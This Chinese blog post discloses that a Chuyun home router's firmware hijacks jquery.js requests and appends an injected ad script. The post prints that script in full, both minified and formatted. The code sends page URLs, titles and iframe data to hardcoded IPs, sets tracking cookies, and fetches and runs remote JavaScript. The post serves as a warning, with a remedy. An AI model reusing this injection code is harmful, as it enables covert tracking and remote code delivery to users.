Gojira 哥斯拉Gojira 哥斯拉

哥斯拉爱好者的日常
生活相当无趣 我得找点乐子

触云爱路由劫持网页投放广告,劫持jquery.js

gojira.net

这个会劫持网页的触云爱路由的情况如下:
固件型号 CY_WiFi_I1
固件版本 1.26.2 (201608221622)

其他版本的不清楚。

具体表现为:遇到网页里面有引用jquery.js的就会被重定向到劫持的网站上去,在原先的jquery.js后面追加一行增加广告/恶意代码。(具体代码中下面)

比如访问http://www.gojira.net/wp-content/themes/ptent/js/jquery.js
就被重定向到http://110.92.64.70:9001/api/js/?link=/rd/www.gojira.net/wp-content/themes/ptent/js/jquery.js?tid=%2205ca52154c1a%22&rid=%2222c0c0bea425%22

被增加的内容如下:
[code];!function(win){var c={log_url:"http://110.92.64.67:6010",ad_url:"http://110.92.64.70:9003",cookie_url:"http://110.92.64.70/get/cookie/",is_log:true,is_decode:true,domain:document.domain.substring(document.domain.indexOf(".")+1,document.domain.length),get_ad:function(){var iframes=document.getElementsByTagName("IFRAME");if(iframes.length<1){return[]}var i=0,domain=document.location.protocol+"//"+document.location.host,property={},adx=[],doc=null;for(i;i<iframes.length;i++){property=[];doc=iframes[i];if(doc.style.visibility!="hidden"&&typeof doc.src!=="undefined"&&doc.src!==""){if(doc.src.indexOf("http")<0||doc.src.indexOf(domain)==0){continue}property.push("s="+encodeURIComponent(doc.src));property.push("i="+(typeof doc.id!=="undefined"?doc.id:""));property.push("w="+doc.offsetWidth);property.push("h="+doc.offsetHeight);property.push("l="+doc.offsetLeft);property.push("tp="+doc.offsetTop);adx.push(property)}}return adx},is_mobile:function(){var e=navigator.userAgent;return !!e.match(/AppleWebKit.*Mobile.*/)||"ontouchstart" in document.documentElement},client:function(){var l=[],b=window.document.body;l.push("url="+encodeURIComponent(document.location.href));l.push("t="+encodeURIComponent(document.title));l.push("sl="+b.scrollWidth);l.push("sh="+b.scrollHeight);return l},image:function(url,callback){var img=new Image;img.src=url;if(typeof callback==="function"){img.onload=function(){callback()}}return img},get_ads:function(){var ads=this.get_ad();if(ads!=""){var ad="",i=0,counts=ads.length,client=this.client().join("&"),val="";for(i;i<counts;i++){ad=ads[i].join("&");this.image(this.log_url+"/api/v1/p/?"+client+"&"+ad)}}},init:function(){var u=document.currentScript.getAttribute("u"),ur=document.currentScript.getAttribute("src"),tid=e.cookie("wf_tid"),rid=e.cookie("wf_rid");if(typeof u!==undefined&&u!==null&&u.indexOf("|")>-1){var p=u.split("|");tid=p[0];rid=p[1];e.load(tid,rid)}else{if(ur.indexOf("?u=")>-1&&ur.indexOf("|")>-1){ur=ur.substring(ur.indexOf("?u=")+3,ur.length);var p=ur.split("|");tid=p[0];rid=p[1];e.load(tid,rid)}else{if(tid==null||rid==null){e.load_js(this.cookie_url,function(d){var dm=document.domain.substring(document.domain.indexOf(".")+1,document.domain.length);if(d.tid!=null&&d.tid!=""){e.cookie("wf_tid",d.tid,365,dm)}if(d.rid!=null&&d.rid!=""){e.cookie("wf_rid",d.rid,365,dm)}e.load(d.tid,d.rid)},true)}else{e.load(tid,rid)}}}if(this.is_log){this.get_ads()}}};var e={is_load:function(){if(self.frameElement&&self.frameElement.tagName=="IFRAME"||window.frames.length!=parent.frames.length||self!=top||document.location.href.indexOf(".gov.cn")>-1){return false}return true},load_js:function(url,callback,is_json,charset){var _doc=document.getElementsByTagName("head")[0],js=document.createElement("script"),cf="jQ"+new Date().getTime()+""+Math.floor(Math.random()*10),n=null;if(typeof callback==="undefined"){callback=function(){}}if(typeof charset==="undefined"){charset="utf-8"}if(typeof is_json!=="undefined"&&is_json==true){eval(cf+"= function(msg) {return "+callback+"(msg);};");url+=(url.indexOf("?")>-1?"&":"?")+"callback="+cf}js.setAttribute("charset",charset);js.setAttribute("type","text/javascript");js.setAttribute("src",url);_doc.appendChild(js);if(typeof js.onload!=="undefined"){js.onload=function(){if(!is_json){callback()}n=js.parentNode;if(n){n.removeChild(js)}}}else{js.onreadystatechange=function(){if(js.readyState=="loaded"||js.readyState=="complete"){js.onreadystatechange=null;if(!is_json){callback&&callback()}n=js.parentNode;if(n){n.removeChild(js)}}}}return false},cookie:function(name,value,day,domain){if(arguments.length==1){var a=document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));if(a!=null){return decodeURIComponent(a[2])}return null}else{if(!arguments[1]){document.cookie=name+"=0; path=/"+((domain)?"; domain="+domain:"")+"; expires=Fri, 02-Jan-1970 00:00:00 GMT"}else{var e=new Date;if(!day){e.setTime(e.getTime()+24*60*60*1000)}else{e.setTime(e.getTime()+day*24*60*60*1000)}e="; expires="+e.toGMTString();document.cookie=name+"="+value+e+"; path=/"+((domain)?";domain="+domain:"")}}},decode:function(code){var a=[],d=[],k="",m=[],c="";for(var i=0;i<6;i++){k=code.charAt(i*2)+""+code.charAt(i*2+1);a.push(parseInt(k,16))}d[0]=a[0]>>6|a[5]<<2;d[1]=a[1]>>6|a[4]<<2;d[2]=a[2]>>6|a[3]<<2;d[3]=a[3]>>6|a[2]<<2;d[4]=a[4]>>6|a[1]<<2;d[5]=a[5]>>6|a[0]<<2;for(var j=0;j<6;j++){c=(d[j]&255).toString(16);if(c.length==1){c="0"+c}m.push(c)}return m.join("")},load:function(rid,tid){if(rid||tid){rid=decodeURI(rid).replace(/"/g,"");tid=decodeURI(tid).replace(/"/g,"");if(c.is_decode){rid=this.decode(rid);tid=this.decode(tid)}}var url=c.ad_url+"/api/v1/get_ad/?uri="+encodeURIComponent(document.location.href)+"&title="+encodeURIComponent(document.title)+"&rid="+rid+"&tid="+tid+"&plat="+(c.is_mobile()?"m":"pc")+"&ref="+encodeURIComponent(document.referrer);e.load_js(url,function(msg){if(msg!==null&&msg!==""&&msg.url!==""){win._cadx.load_js(msg.url)}},true)}};var cy_adx=function(){if(e.is_load()){c.init()}};win._cadx=e;cy_adx()}(window);[/code]

以下是格式化后的代码:

[code]
function(win) {
var c = {
log_url: "http://110.92.64.67:6010",
ad_url: "http://110.92.64.70:9003",
cookie_url: "http://110.92.64.70/get/cookie/",
is_log: true,
is_decode: true,
domain: document.domain.substring(document.domain.indexOf(".") + 1, document.domain.length),
get_ad: function() {
var iframes = document.getElementsByTagName("IFRAME");
if (iframes.length < 1) {
return []
}
var i = 0,
domain = document.location.protocol + "//" + document.location.host,
property = {},
adx = [],
doc = null;
for (i; i < iframes.length; i++) {
property = [];
doc = iframes[i];
if (doc.style.visibility != "hidden" && typeof doc.src !== "undefined" && doc.src !== "") {
if (doc.src.indexOf("http") < 0 || doc.src.indexOf(domain) == 0) {
continue
}
property.push("s=" + encodeURIComponent(doc.src));
property.push("i=" + (typeof doc.id !== "undefined" ? doc.id: ""));
property.push("w=" + doc.offsetWidth);
property.push("h=" + doc.offsetHeight);
property.push("l=" + doc.offsetLeft);
property.push("tp=" + doc.offsetTop);
adx.push(property)
}
}
return adx
},
is_mobile: function() {
var e = navigator.userAgent;
return !! e.match(/AppleWebKit.*Mobile.*/) || "ontouchstart" in document.documentElement
},
client: function() {
var l = [],
b = window.document.body;
l.push("url=" + encodeURIComponent(document.location.href));
l.push("t=" + encodeURIComponent(document.title));
l.push("sl=" + b.scrollWidth);
l.push("sh=" + b.scrollHeight);
return l
},
image: function(url, callback) {
var img = new Image;
img.src = url;
if (typeof callback === "function") {
img.onload = function() {
callback()
}
}
return img
},
get_ads: function() {
var ads = this.get_ad();
if (ads != "") {
var ad = "",
i = 0,
counts = ads.length,
client = this.client().join("&"),
val = "";
for (i; i < counts; i++) {
ad = ads[i].join("&");
this.image(this.log_url + "/api/v1/p/?" + client + "&" + ad)
}
}
},
init: function() {
var u = document.currentScript.getAttribute("u"),
ur = document.currentScript.getAttribute("src"),
tid = e.cookie("wf_tid"),
rid = e.cookie("wf_rid");
if (typeof u !== undefined && u !== null && u.indexOf("|") > -1) {
var p = u.split("|");
tid = p[0];
rid = p[1];
e.load(tid, rid)
} else {
if (ur.indexOf("?u=") > -1 && ur.indexOf("|") > -1) {
ur = ur.substring(ur.indexOf("?u=") + 3, ur.length);
var p = ur.split("|");
tid = p[0];
rid = p[1];
e.load(tid, rid)
} else {
if (tid == null || rid == null) {
e.load_js(this.cookie_url,
function(d) {
var dm = document.domain.substring(document.domain.indexOf(".") + 1, document.domain.length);
if (d.tid != null && d.tid != "") {
e.cookie("wf_tid", d.tid, 365, dm)
}
if (d.rid != null && d.rid != "") {
e.cookie("wf_rid", d.rid, 365, dm)
}
e.load(d.tid, d.rid)
},
true)
} else {
e.load(tid, rid)
}
}
}
if (this.is_log) {
this.get_ads()
}
}
};
var e = {
is_load: function() {
if (self.frameElement && self.frameElement.tagName == "IFRAME" || window.frames.length != parent.frames.length || self != top || document.location.href.indexOf(".gov.cn") > -1) {
return false
}
return true
},
load_js: function(url, callback, is_json, charset) {
var _doc = document.getElementsByTagName("head")[0],
js = document.createElement("script"),
cf = "jQ" + new Date().getTime() + "" + Math.floor(Math.random() * 10),
n = null;
if (typeof callback === "undefined") {
callback = function() {}
}
if (typeof charset === "undefined") {
charset = "utf-8"
}
if (typeof is_json !== "undefined" && is_json == true) {
eval(cf + "= function(msg) {return " + callback + "(msg);};");
url += (url.indexOf("?") > -1 ? "&": "?") + "callback=" + cf
}
js.setAttribute("charset", charset);
js.setAttribute("type", "text/javascript");
js.setAttribute("src", url);
_doc.appendChild(js);
if (typeof js.onload !== "undefined") {
js.onload = function() {
if (!is_json) {
callback()
}
n = js.parentNode;
if (n) {
n.removeChild(js)
}
}
} else {
js.onreadystatechange = function() {
if (js.readyState == "loaded" || js.readyState == "complete") {
js.onreadystatechange = null;
if (!is_json) {
callback && callback()
}
n = js.parentNode;
if (n) {
n.removeChild(js)
}
}
}
}
return false
},
cookie: function(name, value, day, domain) {
if (arguments.length == 1) {
var a = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
if (a != null) {
return decodeURIComponent(a[2])
}
return null
} else {
if (!arguments[1]) {
document.cookie = name + "=0; path=/" + ((domain) ? "; domain=" + domain: "") + "; expires=Fri, 02-Jan-1970 00:00:00 GMT"
} else {
var e = new Date;
if (!day) {
e.setTime(e.getTime() + 24 * 60 * 60 * 1000)
} else {
e.setTime(e.getTime() + day * 24 * 60 * 60 * 1000)
}
e = "; expires=" + e.toGMTString();
document.cookie = name + "=" + value + e + "; path=/" + ((domain) ? ";domain=" + domain: "")
}
}
},
decode: function(code) {
var a = [],
d = [],
k = "",
m = [],
c = "";
for (var i = 0; i < 6; i++) {
k = code.charAt(i * 2) + "" + code.charAt(i * 2 + 1);
a.push(parseInt(k, 16))
}
d[0] = a[0] >> 6 | a[5] << 2;
d[1] = a[1] >> 6 | a[4] << 2;
d[2] = a[2] >> 6 | a[3] << 2;
d[3] = a[3] >> 6 | a[2] << 2;
d[4] = a[4] >> 6 | a[1] << 2;
d[5] = a[5] >> 6 | a[0] << 2;
for (var j = 0; j < 6; j++) {
c = (d[j] & 255).toString(16);
if (c.length == 1) {
c = "0" + c
}
m.push(c)
}
return m.join("")
},
load: function(rid, tid) {
if (rid || tid) {
rid = decodeURI(rid).replace(/"/g, "");
tid = decodeURI(tid).replace(/"/g, "");
if (c.is_decode) {
rid = this.decode(rid);
tid = this.decode(tid)
}
}
var url = c.ad_url + "/api/v1/get_ad/?uri=" + encodeURIComponent(document.location.href) + "&title=" + encodeURIComponent(document.title) + "&rid=" + rid + "&tid=" + tid + "&plat=" + (c.is_mobile() ? "m": "pc") + "&ref=" + encodeURIComponent(document.referrer);
e.load_js(url,
function(msg) {
if (msg !== null && msg !== "" && msg.url !== "") {
win._cadx.load_js(msg.url)
}
},
true)
}
};
var cy_adx = function() {
if (e.is_load()) {
c.init()
}
};
win._cadx = e;
cy_adx()
} (window);
[/code]

看到这两个香港服务器ip得小心了。
110.92.64.67
110.92.64.70

我也仅仅是初步发现了这一点问题,如果继续挖掘,偷取敏感/密码信息都是可能的,例如cookie这些是简简单单就到手了,毕竟上网的数据都经过该路由器

没想到触云爱路由会如此无耻,不要脸到如此地步也没谁了。

解决办法是刷其他路由器的固件,目前我刷的是如意云的固件,网页被劫持情况消失。

GOJIRA.NET原创文章未经允许不得转载! 当前页面:Gojira 哥斯拉 » 触云爱路由劫持网页投放广告,劫持jquery.js

评论